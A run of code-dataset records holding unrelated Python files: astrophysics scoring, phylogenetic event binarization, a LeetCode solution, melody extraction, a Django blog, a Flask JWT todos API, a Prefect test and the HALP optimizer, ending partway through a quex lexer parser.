preload_params_mcmc()\n\t\t##############\n\t\t\n\t\t# Run MCMC with 27/28 elements. 
\n\t\tprint('Running MCMC iteration %d of %d' %(index+1,len(elements_init)))\n\t\t#print(a.elements_to_trace)\n\t\tsingle_star_optimization()\n\t\t\n\t\t# Create the posterior PDF and load it \n\t\trestructure_chain('mcmc/')\n\t\tpositions = np.load('mcmc/posteriorPDF.npy') # Posterior parameter PDF\n\t\t#print(\"In CV_score, element list is\",a.elements_to_trace)\n\t\t\n\t\t##############\n\t\t\n\t\tfor line in fileinput.input(\"Chempy/parameter.py\", inplace=True):\n\t\t\tif \"\\telements_to_trace\" in line:\n\t\t\t\tprint(orig)\n\t\t\telse:\n\t\t\t\tprint(line,end='')\n\t\tfileinput.close()\n\t\tdel sys.modules['Chempy.parameter']\n\t\tdel sys.modules['Chempy.score_function']\n\t\tfrom Chempy.parameter import ModelParameters\n\t\tfrom .score_function import preload_params_mcmc \n\t\ta = ModelParameters()\n\t\tpreload = preload_params_mcmc()\t\n\t\t##############\n\t\t\n\t\t# This uses all 28 elements again for predictions\n\t\t\t\t\n\t\t# Multiprocess and calculate elemental predictions for each parameter set\n\n\t\tfrom .score_function import element_predictor\n\t\tp = mp.Pool()\t\t\n\t\tindices = np.ones(len(positions))*index\n\t\tabundance = list(tqdm.tqdm(p.imap_unordered(element_predictor,zip(positions,indices)),total=len(positions)))\n\t\tp.close()\n\t\tp.join()\t\n\t\t\n\t\tabundance = np.array(abundance)\n\t\tmean,sigma = norm.fit(abundance)\n\t\tprint(mean)\n\t\tprint(sigma)\n\t\t\n\t\telement_mean.append(mean)\n\t\telement_sigma.append(sigma)\n\t\t#a.plot_hist=True\n\t\tif a.plot_hist == True:\n\t\t\tplt.clf()\n\t\t\tplt.hist(abundance, bins=40, normed=True, alpha=0.6, color='g')\n\t\t\t#abundance = np.array(abundance) # Unmask array\n\t\t\t# Plot the PDF.\n\t\t\txmin, xmax = plt.xlim()\n\t\t\tx = np.linspace(xmin, xmax, 100)\n\t\t\tp = norm.pdf(x, mean, sigma)\n\t\t\tplt.plot(x, p, c='k', linewidth=2)\n\t\t\ttitle = 'Plot of element %d abundance' %(index)\n\t\t\tplt.title(title)\n\t\t\tplt.xlabel('[X/Fe] abundance')\n\t\t\tplt.ylabel('Relative frequency')\n\t\t\n\t\ttotal_err = np.sqrt((preload.star_error_list[index])**2 + sigma**2)\n\t\tlikelihood_factor = norm.pdf(mean,loc=preload.star_abundance_list[index],scale=total_err)\n\t\toverall_score *= likelihood_factor\n\t\tfactors.append(likelihood_factor)\n\t\tprint(\"Likelihood contribution from %dth element is %.8f\" %(index+1,likelihood_factor))\n\t\tprint(overall_score)\n\t\tsys.stdout.flush()\n\t\t#print(starting_el)\n\tnp.savez('OverallScores/CV_element_likelihoods.npz',\n\t\t\t\telements=elements_init,\n\t\t\t\tlikelihood_factors=factors,\n\t\t\t\telement_mean = element_mean,\n\t\t\t\telement_sigma = element_sigma)\t\n\t\n\trescaled_score = np.power(overall_score,1./len(starting_el))\n\t\t\t\n\tnp.save(\"OverallScores/CV_score_rescaled - \"+str(a.yield_table_name_sn2)+\\\n\t\",\"+str(a.yield_table_name_agb)+\", \"+str(a.yield_table_name_1a)+\".npy\",rescaled_score)\n\t\t\t\t\n\treturn rescaled_score\n\t\ndef CV_errors():\n\t\"\"\"\n\tThis function computes the overall CV score with errors.\n\tMedian and errors (16/84 percentile) are estimated by running the process 10 times.\n\t\"\"\"\n\tfrom .overall_scores import overall_CV\t\n\timport numpy as np\n\tfrom .parameter import ModelParameters\n\ta = ModelParameters()\n\t\n\tscores = []\n\tfor _ in range(10):\n\t\ttmp = overall_CV()\n\t\tscores.append(np.log10(tmp))\n\t\t\t\n\tmedian = np.median(scores)\n\tlower = np.percentile(scores,15.865)\n\tupper = np.percentile(scores,100-15.865)\n\t\n\tprint(\"Average LOO-CV score over 10 iterations is %.2f + %.2f - %.2f\" 
%(median,median-lower,upper-median))\n\tnp.savez(\"OverallScores/ErrorCV - \"+str(a.yield_table_name_sn2)+\", \"+str(a.yield_table_name_agb)+\", \"+str(a.yield_table_name_1a)+\".npz\",\n\t\t\t\tmedian=median,lower=lower,upper=upper)\n\treturn median, median-lower,upper-median\n\t\ndef CV_element_predictions(size=10):\n\t\"\"\"\n\tThis function computes the NORMALISED element predictions from the CV scoring.\n\tPredictions and sigmas are estimated 10 times over to check for scatter.\n\t\"\"\"\n\tfrom .overall_scores import overall_CV\t\n\timport numpy as np\n\tfrom .parameter import ModelParameters\n\ta = ModelParameters()\n\t\n\tscores = []\n\tel_means=[]\n\tel_sigmas=[]\n\tel_likelihoods=[]\n\tfor i in range(size):\n\t\tprint('Computing score %d of %s' %(i+1,size))\n\t\ttmp = overall_CV()\n\t\tscores.append(np.log10(tmp))\n\t\tel_dat = np.load('OverallScores/CV_element_likelihoods.npz')\n\t\tel_means.append(el_dat['element_mean'])\n\t\tel_sigmas.append(el_dat['element_sigma'])\n\t\tel_likelihoods.append(el_dat['likelihood_factors'])\n\t\tel_dat.close()\n\t\n\tel_dat = np.load('OverallScores/CV_element_likelihoods.npz')\n\tel_names = el_dat['elements']\n\tel_dat.close()\n\t\n\t# Save output as npz file - each will be list of identically simulated data\n\tnp.savez('OverallScores/CV_normalised_element_predictions_'+str(a.yield_table_name_sn2)+'.npz',\n\t\t\t\tmean=el_means,sigma=el_sigmas,elements=el_names,likelihood=el_likelihoods,normalised_scores=scores)\n\t\n\treturn None","repo_name":"henryyuanheng-wang/GibbsChem","sub_path":"Chempy/overall_scores.py","file_name":"overall_scores.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1941523092","text":"import logging\nfrom typing import List\n\nfrom clt_observer import ObservedAlignedSeq\nfrom barcode_metadata import BarcodeMetadata\n\ndef binarize_observations(bcode_meta: BarcodeMetadata, observations: List[ObservedAlignedSeq]):\n \"\"\"\n Prepares the observations to be sent to phylip\n Each event is represented by a tuple (start idx, end idx, insertion)\n\n @return processed_seqs: Dict[str, List[float, List[List[Event]]]]\n this maps the sequence names to (abundance, list of event lists)\n all_event_dict: List[Dict[event_tuple, event number]]\n maps events to their event number\n event_list: List[event_tuple]\n the reverse of all_event_dict\n \"\"\"\n # Figure out what events happened\n processed_seqs = {}\n all_events = [set() for _ in range(bcode_meta.num_barcodes)]\n for idx, obs in enumerate(observations):\n evts_list = []\n for bcode_idx, allele_evts in enumerate(obs.allele_events_list):\n evts = allele_evts.events\n evts_bcode = [evt for evt in evts]\n all_events[bcode_idx].update(evts_bcode)\n evts_list.append(evts_bcode)\n processed_seqs[\"seq{}\".format(idx)] = [obs.abundance, evts_list, obs.cell_state]\n logging.info(\"seq%d %s\", idx, str(obs))\n\n # Assemble events in a dictionary\n event_dicts = []\n event_list = []\n num_evts = 0\n for bcode_idx, bcode_evts in enumerate(all_events):\n bcode_evt_list = list(bcode_evts)\n event_list += [(bcode_idx, evt) for evt in bcode_evt_list]\n event_bcode_dict = {evt: num_evts + i for i, evt in enumerate(bcode_evt_list)}\n num_evts += len(event_bcode_dict)\n event_dicts.append(event_bcode_dict)\n\n return processed_seqs, event_dicts, 
event_list\n","repo_name":"matsengrp/gapml","sub_path":"gestalt/data_binarizer.py","file_name":"data_binarizer.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"37314108657","text":"from property import Property\n\nclass Apartment(Property):\n valid_laundries = (\"coin\", \"ensuits\", \"none\")\n valid_balconies = (\"yes\", \"no\", \"solarium\")\n\n def __init__(self, balcony='', laundry='', **kwargs):\n super().__init__(**kwargs) # imp initializing property constructor with dictionary created by prompt init\n self.balcony = balcony\n self.laundry = laundry\n\n def display(self):\n super().display()\n print(\"Apartment Information\")\n print(\"**********************\")\n print(f\"Laundry: {self.laundry}\")\n print(f\"Has Balcony: {self.balcony}\")\n\n @staticmethod\n def prompt_init():\n parent_init = Property.prompt_init()\n laundry = get_valid_input(\"What laundry facilities does\"\n f\"the property have?:\",\n Apartment.valid_laundries)\n balcony = get_valid_input(\"Does the property have a balcony?\",\n Apartment.valid_balconies)\n parent_init.update({'laundry': laundry, 'balcony': balcony})\n return parent_init\n\ndef get_valid_input(input_string, valid_options):\n input_string += \"({})\".format(','.join(valid_options))\n response = input(input_string)\n while response.lower() not in valid_options:\n response = input(input_string)\n return response\n\nif __name__ == '__main__':\n init = Apartment.prompt_init()\n apartment = Apartment(**init)\n apartment.display()","repo_name":"Lalit-Singh21/Python-programs-","sub_path":"real_estate/property/apartment.py","file_name":"apartment.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22548666208","text":"class Solution(object):\n def knightProbability(self, N, K, r, c):\n \"\"\"\n :type N: int\n :type K: int\n :type r: int\n :type c: int\n :rtype: float\n \"\"\"\n cache = {}\n\n n_moves = pow(8, K)\n\n def rec_move(N, K, r, c):\n\n key = (K, r, c)\n\n if key in cache:\n return cache[key]\n\n out = 0\n\n if 0 <= r < N and 0 <= c < N:\n\n if K > 0:\n\n out1 = rec_move(N, K - 1, r + 2, c + 1)\n out2 = rec_move(N, K - 1, r + 2, c - 1)\n out3 = rec_move(N, K - 1, r - 2, c + 1)\n out4 = rec_move(N, K - 1, r - 2, c - 1)\n out5 = rec_move(N, K - 1, r - 1, c - 2)\n out6 = rec_move(N, K - 1, r + 1, c - 2)\n out7 = rec_move(N, K - 1, r - 1, c + 2)\n out8 = rec_move(N, K - 1, r + 1, c + 2)\n\n out = out1 + out2 + out3 + out4 + out5 + out6 + out7 + out8\n\n cache[key] = out\n else:\n return 1\n\n return out\n\n out = rec_move(N, K, r, c)\n\n return out / n_moves\n\n\n# N - chessboard dim\n# K - moves\n# r-th row knight starts at\n# c-th column knight starts at\nprint(\"Probability that the knight remains on the board after it has stopped moving:\",\n Solution().knightProbability(N=3, K=2, r=0, c=0))\n\nprint(\"Probability that the knight remains on the board after it has stopped moving:\",\n Solution().knightProbability(N=3, K=1, r=0, c=0))","repo_name":"Jachu05/leetcode","sub_path":"688/1_1_1.py","file_name":"1_1_1.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1022995690","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 12 09:51:20 2016\nDescription: Melody (sequence of F0 values) extraction from vocal polyphonic music 
signals.\nDependencies: Esentia - audio feature extraction tool box (http://essentia.upf.edu/)\n SMS tools - (Installation is not required) Spectral modeling and sysnthsis tool box (https://github.com/MTG/sms-tools). Some of the functions are used with acknowledgement. No need to install explicitely \n Numpy - numerical python package\n Scipy - scientific python package\n Matplotlib- python plotting package\nInputs: Music excrept smapled at 44.1KHz and the time frequency pairs of melody obtained from Melodia plug-in for comparision.\nOutputs: Melody of the vocals\n@author: Gurunath Reddy M\n\n\"\"\"\n#==============================================================================\n# import waveio as io\n# import dftStft as stft\n# from scipy.signal import get_window\n# import plotSpect as pltspct\n# import onsetSpectDiff as onspdiff\n# import essentiaSpecGram as essSpec\n#==============================================================================\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom essentia import *\nfrom essentia.standard import *\n\ninputFile = '../segwav/3.wav'\nmelodiaF0File = '../segwav/3.txt' # Melody contour obtained from the Melodia. Please comment if you don't have melody extracted from Melodia (http://mtg.upf.edu/technologies/melodia)\n \nfs = 44100.0\naudio = MonoLoader(filename = inputFile)() # Load audio file\naudio = EqualLoudness()(audio) # Passing music signal through an equal loudness filter to emphasise vocal regions\n#x = np.copy(audio) # Make a copy of signal smaples to convert data type\n#x = np.array(x, np.float64) # Convert the samples to matlab double data type\n#x = x/(1.01*np.max(np.abs(x))); # Normalize sample values\n#x = x - np.mean(x) # Perform mean subtraction to remove DC bias \n#lenX = x.size # Length of the signal in samples\n#timeAxis = np.arange(lenX)/float(fs) # Music signal time axis\nwindow = 'hamming'\n\n# Percussion suppression of the vocal polyphonic music signal\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n#==============================================================================\n# import percussionSuppress as percSupp\n# audio = percSupp.percusionSeparation(audio, fs, window, M=2048, H=512, N=4096, inputFile='harmonic')\n# audio = essentia.array(y)\n#==============================================================================\n\n# Vocal and Non-Vocal detecton\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nhopSize = 256\nframeSize = 2048\nimport saliencyBasedVUV as vnv\nspecGram, vocalBeg, vocalEnd, totalSalienceEnrg = vnv.musicVocaliNonVocalic(audio, hopSize, frameSize, fs)\n\n# Converting vocal beg and end index values to time\nvocalBeg = (vocalBeg * fs) / hopSize # Vocal begin in frame number\nvocalEnd = (vocalEnd * fs) / hopSize # Vocal end in frame number \n\n# Melody contour detection\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nM = 2756 # 1024\nN = 4096 # 2048 \nH = 256 # Corrresponds to 5ms of hop size \nimport dominantHarmonicSeries_V6 as domintharmic\nmedFiltResonF0 = domintharmic.resonanceFreqExtract(audio, fs, M, N, H)\ntimeMedFiltRes = (np.arange(np.size(medFiltResonF0)) * H) /float(fs)\n\nplt.figure() \nplt.plot(timeMedFiltRes, medFiltResonF0, 'g')\nmelodiaF0 = np.loadtxt(melodiaF0File)\nplt.plot(melodiaF0[:, 0], melodiaF0[:, 1], 'r') # Shift the melody obtained by Melodia 
plugin-up by 50Hz for visualization\nplt.ylim([0, 500])\nplt.xlim([0, np.max(timeMedFiltRes)])\nplt.title('Melody without Vocal and Non-Vocal Detection (P = proposed, M = Melodia) ')\nplt.xlabel('Time(s)')\nplt.ylabel('Frequency(Hz)')\nplt.legend(['P', 'M'])\n\nvocalMelody = np.zeros(np.size(medFiltResonF0))\nfor i in range(np.size(vocalBeg)):\n begFrame = np.int(vocalBeg[i])\n endFrame = np.int(vocalEnd[i])\n vocalMelody[begFrame:endFrame] = medFiltResonF0[begFrame:endFrame]\n\nplt.figure() \nplt.plot(timeMedFiltRes, vocalMelody, 'g')\n#melodiaF0 = np.loadtxt(melodiaF0File)\nplt.plot(melodiaF0[:, 0], melodiaF0[:, 1], 'r') # Shift the melody obtained by Melodia plugin-up by 50Hz for visualization\nplt.ylim([0, 500])\nplt.xlim([0, np.max(timeMedFiltRes)])\nplt.title('Melody with Vocal and Non-Vocal Detection (P = proposed, M = Melodia) ')\nplt.xlabel('Time(s)')\nplt.ylabel('Frequency(Hz)')\nplt.legend(['P', 'M'])\n","repo_name":"mgurunathreddy/Melody-Extraction","sub_path":"Saliency_Based_Melody_Extraction/mainDominHarmSeries_V1.py","file_name":"mainDominHarmSeries_V1.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"30791878071","text":"from django.urls import re_path\nfrom blog.views import RSSFeed\nfrom . import views\n\n\napp_name = 'blog'\nurlpatterns = [\n re_path(r'^$', views.index, name='index'),\n re_path(r'^page/(?P[0-9]+)/$', views.get_page, name='page'),\n re_path(r'^post/(?P[0-9]+)/$', views.detail, name='detail'),\n re_path(r'^archives/(?P[0-9]{4})/(?P[0-9]{1,2})/$', views.archives, name='archives'),\n re_path(r'^category/(?P[0-9]+)/$', views.category, name='category'),\n re_path(r'^tag/(?P[0-9]+)/$', views.tag, name='tag'),\n re_path(r'^rss/$', RSSFeed, name=\"RSS\"),\n\n]","repo_name":"786440445/blogproject","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27752560059","text":"import os\nimport json\nimport time\n\nfrom flask import Flask, request, jsonify, g\nimport redis\nfrom pymongo import MongoClient\nimport jwt\n\nfrom utils import random_with_N_digits\n\n\napp = Flask('todos-api')\n\nredis_host = os.getenv('REDIS_HOST')\nredis_port = int(os.getenv('REDIS_PORT'))\nredis_channel = os.getenv('REDIS_CHANNEL')\nzipkin_url = os.getenv('ZIPKIN_URL')\n\npubsub = redis.Redis(host=redis_host, port=redis_port, db=0)\n\nMongoClient('todos-api-db-1', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000)\nMongoClient('todos-api-db-2', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000)\nMongoClient('todos-api-db-3', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000)\ndb = MongoClient(\n 'todos-api-db-1', replicaSet='rs0', serverSelectionTimeoutMS=5000, socketTimeoutMS=5000, connectTimeoutMS=5000\n).test\n\n\n@app.before_request\ndef validate_jwt():\n auth_h = request.headers.get('Authorization')\n if not auth_h:\n print('No authorization provided')\n return 'No authorization provided', 401\n\n if not auth_h.startswith('Bearer '):\n print('Unknown token type')\n return 'Unknown token type', 401\n\n token = auth_h[7:]\n try:\n identity = jwt.decode(\n token, os.getenv('JWT_SECRET'), algorithms='HS256'\n )\n except jwt.ExpiredSignatureError:\n print('JWT is expired')\n return 'JWT is expired', 401\n g.username 
= identity.get('username')\n print('Valid token provided, processing...')\n\n\n@app.route('/todos')\ndef list_todos():\n try:\n cursor = db.todos.find({'username': g.username})\n except:\n time.sleep(15)\n return 'DB problem, please wait', 400\n\n result = []\n for doc in cursor:\n doc['_id'] = str(doc['_id'])\n result.append(doc)\n\n print(result)\n return jsonify(result)\n\n\n@app.route('/todos', methods=['POST'])\ndef add_todo():\n data = request.get_json()\n content = data.get('content')\n try:\n id_ = str(db.todos.insert_one({\n 'username': g.username,\n 'content': content\n }).inserted_id)\n except:\n time.sleep(15)\n return 'DB problem, please wait', 400\n\n code = str(random_with_N_digits(16))\n log_info = {\n 'zipkinSpan': {\n '_traceId': {'value': code},\n '_parentId': {'type': 'None', 'present': False},\n '_spanId': code,\n '_sampled': {'value': True},\n '_flags': 0\n },\n 'opName': 'CREATE',\n 'username': g.username,\n 'todoId': 3,\n }\n json_mylist = json.dumps(log_info, separators=(',', ':'))\n pubsub.publish(redis_channel, json_mylist)\n\n result = {'id': id_, 'content': content}\n print(result)\n return jsonify(result)\n\n\n@app.route('/todos/', methods=['DELETE'])\ndef delete_todo(id_):\n try:\n db.todos.delete_one({'_id': g.username, 'username': g.username})\n except:\n time.sleep(15)\n return 'DB problem, please wait', 400\n\n code = str(random_with_N_digits(16))\n log_info = {\n 'zipkinSpan': {\n '_traceId': {'value': code},\n '_parentId': {'type': 'None', 'present': False},\n '_spanId': code,\n '_sampled': {'value': True},\n '_flags': 0\n },\n 'opName': 'DELETE',\n 'username': g.username,\n 'todoId': id_,\n }\n json_mylist = json.dumps(log_info, separators=(',', ':'))\n pubsub.publish(redis_channel, json_mylist)\n\n print(f'Todo with id {id_} deleted')\n return 'Ok', 200\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 8082)\n","repo_name":"Nikita-L/microservices-demo","sub_path":"todos-api/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74304793878","text":"from prefect_setup.prefect_register.prefect_helpers import PrefectHelpers\n\nimport pytest\n\nFLOW_NAME = \"my-ecr-workflow\"\nENVIRONMENT = \"test\"\nprefect_helpers = PrefectHelpers()\n\n\ndef test_get_prefect_aws_infrastructure(mocker):\n \"\"\"\n Test get prefect AWS infrastructure to register workflow\n \"\"\"\n mocker.patch(\n \"aws_conn_helpers.AwsConnHelpers.get_subnets\",\n return_value=\"subnets\",\n )\n mocker.patch(\n \"aws_conn_helpers.AwsConnHelpers.get_iam_roles\",\n return_value=(\"iam_role1\", \"iam_role2\"),\n )\n mocker.patch(\n \"aws_conn_helpers.AwsConnHelpers.get_aws_creds\",\n return_value=(\"account_id\", \"aws_region\"),\n )\n assert (\n \"account_id\",\n \"aws_region\",\n \"subnets\",\n \"iam_role1\",\n \"iam_role2\",\n ) == prefect_helpers.get_prefect_aws_infrastructure(ENVIRONMENT)\n","repo_name":"maikelpenz/dataflow-automation-infra","sub_path":"tests/unit/prefect_setup/prefect_register/test_prefect_helpers.py","file_name":"test_prefect_helpers.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"85"} +{"seq_id":"40733477851","text":"from torch.optim.optimizer import Optimizer, required\nimport torch\nfrom torch.autograd import Variable\nimport copy, logging\nimport math\n\nimport torchhalp.quantize\n\nclass HALP(torch.optim.SGD):\n \"\"\"Implements 
high-accuracy low-precision algorithm.\n Args:\n params (iterable): iterable of parameters to optimize\n lr (float): learning rate\n T (int): number of iterations between the step to take the full grad/save w\n data_loader (DataLoader): dataloader to use to load training data\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n momentum (float, optional): momentum (default: 0)\n opt (torch.optim): optimizer to baseclass (default: SGD)\n mu (float, optional): mu hyperparameter for HALP algorithm (default: 0.1)\n bits (int, optional): number of bits to use for offset (default: 8)\n biased (bool, optional): type of rounding to use for quantization (default: unbiased)\n \"\"\"\n\n def __init__(self, params, lr=required, T=required, data_loader=required,\n weight_decay=0.0, momentum=0.0, opt=torch.optim.SGD, mu=1e-1, bits=8, biased=False):\n\n defaults = dict(lr=lr, weight_decay=weight_decay, momentum=momentum)\n\n # Choose the baseclass dynamically\n self.__class__ = type(self.__class__.__name__,\n (opt,object),\n dict(self.__class__.__dict__))\n logging.info(\"Using base optimizer {} in HALP\".format(opt))\n super(self.__class__, self).__init__(params, **defaults)\n\n if len(self.param_groups) != 1:\n raise ValueError(\"HALP doesn't support per-parameter options \"\n \"(parameter groups)\")\n\n if bits <= 1:\n raise ValueError(\"HALP requires > 1 bit.\")\n\n params = self.param_groups[0]['params']\n self._params = params\n\n self._curr_w = [p.data for p in params]\n self._z = [p.data.clone() for p in params]\n self._prev_w = [p.data.clone() for p in params]\n\n # Gradients are lazily allocated and don't exist yet. However, gradients are\n # the same shape as the weights so we can still allocate buffers here\n self._curr_grad = [p.data.clone() for p in params]\n self._prev_grad = [p.data.clone() for p in params]\n self._full_grad = None\n\n self.data_loader = data_loader\n self.state['t_iters'] = T\n self.T = T # Needed to trigger full gradient\n logging.info(\"Data Loader has {} with batch {}\".format(len(self.data_loader),\n self.data_loader.batch_size))\n # Separate scale factor for each layer\n self._scale_factors = [1 for p in params]\n self._bits = bits\n self._mu = mu\n self._biased = biased\n\n def __setstate__(self, state):\n super(self.__class__, self).__setstate__(state)\n\n def _zero_grad(self):\n for p in self._params:\n if p.grad is not None:\n p.grad.detach()\n p.grad.zero_()\n\n def _set_weights_grad(self,ws,gs):\n \"\"\" Set the pointers in params to ws and gs for p.data and p.grad.data\n respectively. 
This allows us to avoid copying data in and out of parameters.\n \"\"\"\n for idx, p in enumerate(self._params):\n if ws is not None: p.data = ws[idx]\n if gs is not None and p.grad is not None:\n p.grad.data = gs[idx]\n assert (p.grad.data.data_ptr() == gs[idx].data_ptr())\n\n def _rescale(self):\n \"\"\"Update scale factors for z.\"\"\"\n div_factor = math.pow(2.0, self._bits-1) - 1\n for i, fg in enumerate(self._full_grad):\n self._scale_factors[i] = fg.norm() / (self._mu * div_factor)\n\n def _reset_z(self):\n \"\"\"Set z to zero.\"\"\"\n for p in self._z:\n p.fill_(0)\n\n def _recenter(self, ws):\n \"\"\"Add the values in self._z to ws.\"\"\"\n for w, z in zip(ws, self._z):\n w.add_(z)\n\n def _compute_full_grad(self, closure):\n \"\"\" Call the closure function to compute the gradient\n over the entire dataset, and accumulate the gradient into\n self._full_grad.\n \"\"\"\n\n # Set up pointers for the full gradient\n # Reset gradients before accumulating them\n self._set_weights_grad(self._prev_w, self._full_grad)\n self._zero_grad()\n\n # Accumulate gradients\n for i, (data, target) in enumerate(self.data_loader):\n closure(data, target)\n\n # Adjust summed gradients by num_iterations accumulated over\n # Assumes loss size average argument is true\n for p in self._params:\n if p.grad is not None:\n p.grad.data /= len(self.data_loader)\n\n # Since p.grad is dynamically allocated, the pointers to the gradients won't\n # be set before backward is called the first time\n if self._full_grad is None:\n self._full_grad = [p.grad.data.clone() for p in self._params]\n\n def step(self, closure):\n \"\"\"Performs a single optimization step.\n Arguments:\n closure (callable): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n assert len(self.param_groups) == 1\n\n # Calculate full gradient\n if self.state['t_iters'] == self.T:\n self._compute_full_grad(closure)\n self._rescale()\n self._reset_z()\n # Reset t\n self.state['t_iters'] = 0\n\n # Calculate gradient of prev_w\n self._set_weights_grad(self._prev_w, self._prev_grad)\n self._zero_grad()\n closure()\n\n # Calculate the current curr_w (which equals prev_w + z)\n self._set_weights_grad(self._curr_w, self._curr_grad)\n self._zero_grad()\n loss = closure()\n\n # Adjust the current gradient using the previous gradient and the full gradient.\n for i, p in enumerate(self._params):\n # Adjust gradient in-place\n if p.grad is not None:\n # gradient_update = curr_grad - prev_grad + full_grad\n p.grad.data -= (self._prev_grad[i] - self._full_grad[i])\n\n # Set the param pointers to z to update z with step\n self._set_weights_grad(self._z, None)\n # Call optimizer update step\n super(self.__class__, self).step()\n\n # Quantize z in place\n for p, sf in zip(self._z, self._scale_factors):\n p.quantize_(sf, self._bits, biased=self._biased)\n\n # Increment \"inner loop\" counter\n self.state['t_iters'] += 1\n\n # Set curr_w to prev_w + z\n for p, p0 in zip(self._curr_w, self._prev_w):\n p.copy_(p0)\n self._recenter(self._curr_w)\n # Update param pointers to curr_w for user access\n self._set_weights_grad(self._curr_w, self._curr_grad)\n\n # Update prev_w to prev_w + z after the \"inner loop\" has finished\n if self.state['t_iters'] == self.T:\n self._recenter(self._prev_w)\n\n return loss\n","repo_name":"HazyResearch/torchhalp","sub_path":"torchhalp/optim/halp.py","file_name":"halp.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} 
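The record above defines a closure-driven optimizer: `step(closure)` re-evaluates the loss, and every T iterations HALP pulls batches from its own data_loader to rebuild the full gradient. Below is a minimal usage sketch, not the authors' own example: it assumes the package installs cleanly and that the class is importable from the module path given in the record (torchhalp/optim/halp.py); the model, loss function, and data are placeholders.

# Hypothetical end-to-end sketch for the HALP optimizer defined above.
import torch
import torch.nn as nn
from torch.utils.data import DataLoader, TensorDataset
from torchhalp.optim.halp import HALP  # assumed import path, taken from the record's sub_path

X, y = torch.randn(64, 10), torch.randn(64, 1)            # toy regression data
train_loader = DataLoader(TensorDataset(X, y), batch_size=8)

model = nn.Linear(10, 1)
loss_fn = nn.MSELoss()

# T = one full pass between full-gradient recomputations; bits/mu as described in the docstring.
opt = HALP(model.parameters(), lr=0.1, T=len(train_loader),
           data_loader=train_loader, bits=8, mu=0.1)

for epoch in range(2):
    for data, target in train_loader:
        # The closure must also accept the (data, target) pairs HALP feeds it while
        # accumulating the full gradient, and it must not zero gradients itself --
        # HALP calls its own _zero_grad() before each evaluation.
        def closure(d=data, t=target):
            loss = loss_fn(model(d), t)
            loss.backward()
            return loss
        loss = opt.step(closure)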
+{"seq_id":"7881479040","text":"\nimport quex.blackboard as blackboard\n\nimport quex.input.regular_expression.core as regular_expression\nimport quex.input.files.code_fragment as code_fragment\nimport quex.input.files.indentation_setup as indentation_setup\nimport quex.input.files.consistency_check as consistency_check\nimport quex.input.regular_expression.snap_character_string as snap_character_string\nfrom quex.input.regular_expression.construct import Pattern\nfrom quex.blackboard import setup as Setup, \\\n E_SpecialPatterns\n\nfrom quex.engine.generator.action_info import CodeFragment, UserCodeFragment, GeneratedCode, PatternActionInfo\nfrom quex.engine.generator.languages.address import get_label\nimport quex.engine.generator.skipper.character_set as skip_character_set\nimport quex.engine.generator.skipper.range as skip_range\nimport quex.engine.generator.skipper.nested_range as skip_nested_range\nimport quex.engine.generator.state.indentation_counter as indentation_counter\nfrom quex.engine.misc.file_in import EndOfStreamException, \\\n check, \\\n check_or_die, \\\n copy, \\\n error_msg, \\\n get_current_line_info_number, \\\n read_identifier, \\\n read_option_start, \\\n read_option_value, \\\n read_until_letter, \\\n read_until_whitespace, \\\n skip_whitespace, \\\n verify_word_in_list\n\nfrom quex.engine.state_machine.core import StateMachine\nimport quex.engine.state_machine.check.identity as identity_checker\nimport quex.engine.state_machine.sequentialize as sequentialize\nimport quex.engine.state_machine.repeat as repeat\nimport quex.engine.state_machine.algorithm.beautifier as beautifier\nimport quex.engine.state_machine.algorithm.nfa_to_dfa as nfa_to_dfa\nimport quex.engine.state_machine.algorithm.hopcroft_minimization as hopcroft\n\nfrom copy import deepcopy\n\n# ModeDescription/Mode Objects:\n#\n# During parsing 'ModeDescription' objects are generated. Once parsing is over, \n# the descriptions are translated into 'real' mode objects where code can be generated\n# from. All matters of inheritance and pattern resolution are handled in the\n# transition from description to real mode.\n#-----------------------------------------------------------------------------------------\n# mode_description_db: storing the mode information into a dictionary:\n# key = mode name\n# item = ModeDescription object\n#-----------------------------------------------------------------------------------------\nmode_description_db = {}\n\nclass OptionInfo:\n \"\"\"This type is used only in context of a dictionary, the key\n to the dictionary is the option's name.\"\"\"\n def __init__(self, Type, Domain=None, Default=-1):\n # self.name = Option see comment above\n self.type = Type\n self.domain = Domain\n self.default_value = Default\n\nclass ModeDescription:\n def __init__(self, Name, Filename, LineN):\n\n self.filename = Filename\n self.line_n = LineN\n\n self.name = Name\n self.base_modes = []\n # Read 